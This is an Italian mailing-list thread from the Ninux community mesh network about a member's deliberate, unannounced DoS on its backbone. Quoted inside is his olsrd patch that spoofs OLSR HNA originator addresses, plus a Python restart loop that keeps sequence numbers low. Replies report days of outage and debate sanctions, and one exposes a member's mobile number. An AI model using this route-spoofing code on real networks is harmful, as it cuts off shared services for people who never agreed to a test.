Stai sbagliando perche' la macchina 172.16.40.40 esisteva Per cessare l'attacco e' stata passata a 172.16.40.43 avvisando i propietari preventivamente. Quindi essendo male informato anche le tue conclusioni restano affrettate.
Penso di aver concluso. Il 25/mag/2014 13:32 "Alessandro (aka ArkaNet)" <arkant...@gmail.com> ha scritto: > Perdona(te) il replay ma è doveroso... > > 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque > in un 'attacco' simile > 2) i servizi sono come il miele per api ed orsi, ergo vedi 1) > 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente > né sul mapserver né sul wiki > > Detto ciò non avere fretta di sentirti tu il diretto interessato > dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a > difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se > un servizio è centralizzato è più semplice da identificare ed attaccare > > Quindi, sì Buona Domenica ;) > > *-- > Arka* > > > > Il giorno 25 maggio 2014 12:27, Andrea Pescetelli < > andrea.pescete...@gmail.com> ha scritto: > >> Non è sminuendo la cosa che si risolve il problema. >> Dove andare a colpire in un azione premeditata? >> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri >> fanno gsoc e scambiano opinioni. >> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta >> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto >> girarci anche il blog che gyardacaso non approva. >> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche >> il mail server di Nino? >> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che >> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine >> quindo oltre al culo per sistemare pura la presa per il culo a fare la >> caccia alle streghe di un danno provocato senza avviso. >> >> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma >> danno provocato e torno a ripetere che un provvedimento simbolico va preso. >> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio. >> >> Se per voi questa è ninux allora non utilizzate i servizi che non >> approvate e fate un passo indietro. >> >> >> >> >> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) < >> arkant...@gmail.com> ha scritto: >> >> Hola! >>> >>> Fish hai ragione dobbiamo fare qualcosa!! >>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un >>> macellaio utilizzare un coltello. >>> Cosa dovremmo aver acquisito alla luce di ciò? >>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe >>> una strage! >>> >>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha >>> voglia (e capacità) può farci male. >>> I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che >>> sicuramente non avvisino prima di agire! >>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e >>> bestemmiare, insomma ... non si fa ;) >>> >>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo >>> costruircela. A volte non basta fare il link migliore per poter dire di >>> avere una struttura solida. >>> Abbiamo anche bisogno di un motore che spinga! >>> >>> E poi ricordiamoci che ninux fa rima con relax! >>> >>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per >>> essere controllabile) >>> >>> Bella && Buona Domenica @tutti >>> >>> *-- >>> Arka* >>> >>> >>> >>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli < >>> andrea.pescete...@gmail.com> ha scritto: >>> >>> Ciao >>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi >>>> eventi e comportamenti che da una settimana stanno invalidando sia il >>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di >>>> Saverio Proto. >>>> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessan...@gnagni.it> ha >>>> scritto: >>>> >>>>> Non è qualche ora. Va avanti da giovedì mattina. >>>>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose... >>>>> Jabber è stato ko da giovedì per sta cosa. >>>>> Il 25/mag/2014 01:03 "Saverio Proto" <ziopr...@gmail.com> ha scritto: >>>>> >>>>>> Ciao, >>>>>> >>>>>> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene >>>>>> informazioni tecniche interessanti. >>>>>> >>>>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato >>>>>> un attacco DoS sul backbone per capire che effetto poteva avere. >>>>>> >>>>>> ecco la patch di olsrd con cui generavo l'attacco DoS >>>>>> >>>>>> diff --git a/src/build_msg.c b/src/build_msg.c >>>>>> index 109f955..e252981 100644 >>>>>> --- a/src/build_msg.c >>>>>> +++ b/src/build_msg.c >>>>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp) >>>>>> m = (union olsr_message *)msg_buffer; >>>>>> >>>>>> /* Fill header */ >>>>>> - m->v4.originator = olsr_cnf->main_addr.v4.s_addr; >>>>>> + struct in_addr fakesource; >>>>>> + fakesource.s_addr = 0; >>>>>> + //inet_hton(2956867021,&fakesource); >>>>>> + inet_aton("172.16.40.40",&fakesource); >>>>>> + m->v4.originator = fakesource.s_addr; >>>>>> m->v4.hopcnt = 0; >>>>>> m->v4.ttl = MAX_TTL; >>>>>> m->v4.olsr_msgtype = HNA_MESSAGE; >>>>>> >>>>>> >>>>>> una domanda, >>>>>> >>>>>> se avessi patchato anche: >>>>>> >>>>>> m->v4.hopcnt = XXX >>>>>> >>>>>> mettendo numeri casuali.. >>>>>> >>>>>> sarebbe stato altrettanto facile capire chi è che iniettava questi >>>>>> messaggi ? >>>>>> >>>>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto >>>>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C >>>>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo >>>>>> che vorrei provare è DrDoS su snmp). >>>>>> >>>>>> un problema di questo attacco sono cmq i sequence number. Per rendere >>>>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di >>>>>> OLSR a singhiozzo: >>>>>> >>>>>> import os >>>>>> import time >>>>>> >>>>>> while True: >>>>>> os.system("olsrd") >>>>>> print "started\n" >>>>>> time.sleep(120) >>>>>> os.system("killall olsrd") >>>>>> print "killed\n" >>>>>> time.sleep(300) >>>>>> >>>>>> in quanto avevo bisogno che i miei sequence number dovevano sempre >>>>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati >>>>>> come out of sequence. >>>>>> >>>>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la >>>>>> parte di come ti costruisce l'attacco e voi la parte di come avete >>>>>> fatto ad identificare il nodo spoofato ? >>>>>> >>>>>> ho staccatto il nodo attaccante, il gioco è finito :) >>>>>> >>>>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this >>>>>> is Ninux. Si fanno queste cose perché ci si diverte insieme. >>>>>> >>>>>> ciao :) >>>>>> >>>>>> Saverio >>>>>> >>>>>> Il 24 maggio 2014 23:23, Andrea Pescetelli >>>>>> <andrea.pescete...@gmail.com> ha scritto: >>>>>> > Saverio, >>>>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio >>>>>> olsr hna >>>>>> > con originator 172.16.40.40, validity time 570, hna >>>>>> 176.62.53.192/28 >>>>>> > proveniente dal nodo in oggetto. >>>>>> > >>>>>> > Questo problema sta oscurando diversi servizi di ninux in farm >>>>>> appartenenti >>>>>> > a quella subnet. >>>>>> > >>>>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei >>>>>> cammini >>>>>> > multipli. >>>>>> > puoi verificare? >>>>>> > >>>>>> > Grazie >>>>>> > >>>>>> > Fish, Hispanico, Halino >>>>>> > -- >>>>>> > Andrea Pescetelli aka Fish >>>>>> > Skype: andrea5742 >>>>>> > Ninux int: 5001/5002 >>>>>> > Mobile: +39 3891156050 >>>>>> > >>>>>> > >>>>>> > >>>>>> > >>>>>> >>>>> >>>>> _______________________________________________ >>>>> Wireless mailing list >>>>> Wireless@ml.ninux.org >>>>> http://ml.ninux.org/mailman/listinfo/wireless >>>>> >>>>> >>> >> >> >> -- >> Andrea Pescetelli aka Fish >> Skype: andrea5742 >> Ninux int: 5001/5002 >> Mobile: +39 3891156050 >> >> >> >> >> >> _______________________________________________ >> Wireless mailing list >> Wireless@ml.ninux.org >> http://ml.ninux.org/mailman/listinfo/wireless >> >> >
_______________________________________________ Wireless mailing list Wireless@ml.ninux.org http://ml.ninux.org/mailman/listinfo/wireless